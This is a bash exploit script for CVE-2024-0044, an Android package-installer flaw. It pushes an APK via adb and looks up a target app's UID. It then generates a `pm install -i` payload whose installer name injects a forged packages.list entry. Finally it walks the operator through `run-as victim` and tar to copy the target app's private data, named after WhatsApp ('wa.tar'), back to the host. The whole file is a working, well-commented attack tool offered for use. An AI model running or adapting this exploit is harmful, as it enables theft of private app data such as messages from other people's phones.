#!/bin/bash
# Define colors
# ANSI escape sequences used by the status output below. They are stored as
# literal backslash strings and rendered by `echo -e` at the point of use, so
# the assignments themselves contain no control characters.
CYAN='\033[36m'
GREEN='\033[32m'
BOLD='\033[1m'
RESET='\033[0m'
# Unicode check / cross marks for status lines (rendered by `echo -e`, which
# needs bash >= 4.2 for the \u escape).
CHECK_MARK='\u2714'
ERROR_MARK='\u2716'
# Print the tool banner: the cyan+bold escape on a line of its own, the framed
# title, then the reset escape on a line of its own.
# Globals: CYAN, BOLD, RESET (read)
# Outputs: banner on stdout
display_banner() {
  printf '%b\n' "${CYAN}${BOLD}"
  printf '%s\n' \
    '##########################################' \
    '# CVE-2024-0044 #' \
    '# > Nahid0x1 #' \
    '##########################################'
  printf '%b\n' "${RESET}"
}
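# Copy the operator-supplied APK to the device's world-accessible staging
# directory (/data/local/tmp/), where the later `pm install` can read it.
# Arguments: $1 - path to the APK on the host
# Outputs:   success line on stdout; error text on stderr
# Returns:   0 on success, 1 if the file is missing or `adb push` fails
push_apk() {
  local apk_path=$1
  if [[ ! -f "$apk_path" ]]; then
    echo "Error: APK file '$apk_path' does not exist." >&2
    return 1
  fi
  # adb's own diagnostics stay visible so the operator can see why it failed.
  if ! adb push "$apk_path" /data/local/tmp/; then
    echo -e "${CYAN}${BOLD}[${ERROR_MARK}] Error: Failed to push APK." >&2
    return 1
  fi
  echo -e "${CYAN}${BOLD}[${CHECK_MARK}] Successfully pushed '${GREEN}${apk_path}${CYAN}' to '${GREEN}/data/local/tmp/$(basename "$apk_path")${CYAN}'"
  return 0
}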
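# Resolve the Linux UID of an installed package from `pm list packages -U`.
#
# Only the numeric UID is written to stdout so callers can capture it with
# $(...); status and error lines go to stderr. Previously the coloured status
# line was also printed on stdout, so `uid=$(get_app_uid ...)` captured the
# message as part of the UID and the generated payload was malformed.
# The package name is no longer interpolated into the remote shell command
# (`adb shell "... | grep $pkg"`): the listing is filtered on the host with
# an exact field comparison, which avoids shell-metacharacter injection via
# -P and accidental prefix matches (com.example also matched
# com.example.other, yielding several UIDs).
#
# Arguments: $1 - package name (e.g. com.whatsapp)
# Outputs:   UID on stdout; status text on stderr
# Returns:   0 on success, 1 if the package is not listed or the parsed UID
#            is not purely numeric
get_app_uid() {
  local package_name=$1
  local uid
  # Older adb versions emit CRLF from `adb shell`; drop the CR before parsing.
  uid=$(adb shell "pm list packages -U" | tr -d '\r' \
    | awk -v pkg="package:${package_name}" '$1 == pkg { sub(/^uid:/, "", $2); print $2; exit }')
  if [[ ! "$uid" =~ ^[0-9]+$ ]]; then
    echo -e "${CYAN}${BOLD}[${ERROR_MARK}] Error: Could not find UID for package '${package_name}'" >&2
    return 1
  fi
  echo -e "${CYAN}${BOLD}[${CHECK_MARK}] Got the target UID for ${GREEN}${package_name}${CYAN}: ${GREEN}${uid}${CYAN}" >&2
  echo "$uid"
  return 0
}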
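# Build the CVE-2024-0044 installer-name payload and save it to payload.txt.
#
# The payload is the pair of shell lines the operator pastes into `adb shell`:
# it sets PAYLOAD to an installer string that carries a forged packages.list
# entry ("victim <uid> 1 /data/user/0 ...") and then runs `pm install -i`
# with it. The text is reproduced exactly as before. Two additions: the UID
# must be purely numeric (anything else produces a malformed entry, and a
# caller that captures a status line together with the UID would otherwise
# silently poison the payload), and the file is written before the
# "saved to" message is printed.
#
# Arguments: $1 - target UID (digits only)
#            $2 - APK file name under /data/local/tmp/
# Outputs:   status lines and the payload on stdout; payload.txt in the cwd
# Returns:   1 if the UID is not numeric or the file cannot be written
#            (nothing is written in the first case); otherwise hands off to
#            prompt_user_for_next_action
generate_payload() {
  local uid=$1
  local apk_filename=$2
  local payload
  if [[ ! "$uid" =~ ^[0-9]+$ ]]; then
    echo -e "${CYAN}${BOLD}[${ERROR_MARK}] Error: UID '${uid}' is not numeric; refusing to build payload." >&2
    return 1
  fi
  payload="PAYLOAD=\"@null\nvictim ${uid} 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null\"\npm install -i \"\$PAYLOAD\" /data/local/tmp/${apk_filename}"
  # printf '%s\n' writes the text verbatim, exactly as `echo "$payload"` did.
  if ! printf '%s\n' "$payload" > payload.txt; then
    echo -e "${CYAN}${BOLD}[${ERROR_MARK}] Error: could not write payload.txt" >&2
    return 1
  fi
  echo -e "${CYAN}${BOLD}[${CHECK_MARK}] Payload generated and saved to: ${GREEN}payload.txt${CYAN}"
  echo -e "${GREEN}${payload}${GREEN}"
  prompt_user_for_next_action
}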
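# Ask the operator to confirm that the payload has been run in `adb shell`.
# 'y' continues with run_adb_commands, 'n' exits the script, anything else
# re-prompts. `read -r` keeps backslashes in the answer literal, and EOF on
# stdin now ends the script instead of spinning forever on an empty answer
# (the original loop never checked read's status).
# Outputs: prompt on stderr when stdin is a terminal; "Exiting." on stdout;
#          diagnostics on stderr
prompt_user_for_next_action() {
  local user_input
  while true; do
    if ! read -r -p "Copy the above command in adb shell. After you finish, type 'y' to continue or 'n' to quit: " user_input; then
      echo -e "${CYAN}${BOLD}[${ERROR_MARK}] No input available; exiting." >&2
      exit 1
    fi
    case $user_input in
      [Yy]*) run_adb_commands; break ;;
      [Nn]*) echo "Exiting."; exit ;;
      *) echo -e "${CYAN}${BOLD}[${ERROR_MARK}] Invalid input. Please type 'y' to continue or 'n' to quit." >&2 ;;
    esac
  done
}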
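# Show the `run-as victim` + `tar` commands the operator must paste into
# `adb shell` and wait for confirmation. 'y' pulls the archive with
# pull_with_progress, 'n' exits, anything else re-prompts. `read -r` keeps
# backslashes literal and EOF on stdin ends the script instead of looping
# forever (the original never checked read's status).
# Globals: package_name (read) - the target package, set by the main script
# Outputs: the two commands on stdout each iteration; "Exiting." on stdout;
#          prompt/diagnostics on stderr
prompt_user_to_run_as() {
  local user_input
  while true; do
    echo -e "${GREEN}run-as victim\ntar -cf /data/local/tmp/wa/wa.tar ${package_name}${CYAN}"
    if ! read -r -p "Copy the above commands in adb shell. After you finish, type 'y' to continue or 'n' to quit: " user_input; then
      echo -e "${CYAN}${BOLD}[${ERROR_MARK}] No input available; exiting." >&2
      exit 1
    fi
    case $user_input in
      [Yy]*) pull_with_progress "wa.tar"; break ;;
      [Nn]*) echo "Exiting."; exit ;;
      *) echo -e "${CYAN}${BOLD}[${ERROR_MARK}] Invalid input. Please type 'y' to continue or 'n' to quit." >&2 ;;
    esac
  done
}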
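# Copy the archive the victim process wrote to /data/local/tmp/wa/wa.tar back
# to the host.
#
# Fixes relative to the original: the status lines printed `$(unknown)` — a
# non-existent command, so the file name came out empty and
# "unknown: command not found" was logged; the size is measured with `wc -c`
# so the "bytes" label is accurate (`du -s` reports blocks); and the transfer
# uses `adb exec-out`, which does not go through a PTY, instead of
# `adb shell cat`, which can rewrite newlines in binary data on older adb.
#
# Arguments: $1 - destination file name on the host
# Outputs:   status lines on stdout; the archive written to $1
# Returns:   0 on success, 1 if no name is given or the transfer fails
pull_with_progress() {
  local filename=$1
  local device_path="/data/local/tmp/wa/wa.tar"
  local filesize
  if [[ -z "$filename" ]]; then
    echo -e "${CYAN}${BOLD}[${ERROR_MARK}] Error: no destination file name given." >&2
    return 1
  fi
  # Strip whitespace/CR so the value is a bare number even on CRLF-emitting adb.
  filesize=$(adb shell "wc -c < $device_path" | tr -d '[:space:]')
  echo -e "${CYAN}${BOLD}[${CHECK_MARK}] Downloading file: ${GREEN}${filename}${CYAN} (size: ${GREEN}${filesize:-?}${CYAN} bytes)"
  if ! adb exec-out cat "$device_path" > "$filename"; then
    echo -e "${CYAN}${BOLD}[${ERROR_MARK}] Error: failed to read ${device_path} from the device." >&2
    return 1
  fi
  echo -e "\n${CYAN}${BOLD}[${CHECK_MARK}] Download complete: ${GREEN}${filename}${CYAN}"
  return 0
}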
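# Prepare the drop directory on the device and hand over to
# prompt_user_to_run_as.
#
# The directory is made world-writable (0777) on purpose: the archive is
# written by the victim UID via `run-as` but read back by the shell user.
# `mkdir -p` replaces plain `mkdir` so re-running against a device that
# already has the directory no longer logs a spurious error. As before, a
# failing command is reported and the sequence continues so the operator can
# decide whether to proceed.
# Outputs: one status line per command on stdout; errors on stderr
run_adb_commands() {
  local commands=(
    "mkdir -p /data/local/tmp/wa/"
    "touch /data/local/tmp/wa/wa.tar"
    "chmod -R 0777 /data/local/tmp/wa/"
  )
  local command
  for command in "${commands[@]}"; do
    if adb shell "$command"; then
      echo -e "${CYAN}${BOLD}[${CHECK_MARK}] Command executed successfully: $command"
    else
      echo -e "${CYAN}${BOLD}[${ERROR_MARK}] Error executing command: $command" >&2
    fi
  done
  prompt_user_to_run_as
}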
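# ---- Main script execution ---------------------------------------------------
# Usage: exploit.sh -P <package_name> -A <apk_file_path>
# Flow: push the APK, resolve the target package's UID, generate the payload,
# then walk the operator through the remaining interactive steps (the later
# functions chain into each other from prompt_user_for_next_action onwards).
display_banner
# Every step needs adb; fail early with a clear message instead of a
# "command not found" from inside push_apk.
if ! command -v adb >/dev/null 2>&1; then
  echo "Error: 'adb' was not found in PATH." >&2
  exit 1
fi
package_name=""
apk_path=""
while getopts "P:A:" opt; do
  case $opt in
    P) package_name=$OPTARG ;;
    A) apk_path=$OPTARG ;;
    *) echo "Invalid option" >&2; exit 1 ;;
  esac
done
if [[ -z "$package_name" || -z "$apk_path" ]]; then
  echo "Usage: $0 -P <package_name> -A <apk_file_path>" >&2
  exit 1
fi
push_apk "$apk_path" || exit 1
apk_filename=$(basename "$apk_path")
# The assignment's status is get_app_uid's own, so test it directly rather
# than inspecting $? on the next line.
if uid=$(get_app_uid "$package_name"); then
  generate_payload "$uid" "$apk_filename"
else
  echo "Failed to retrieve UID for package '$package_name'." >&2
  exit 1
fi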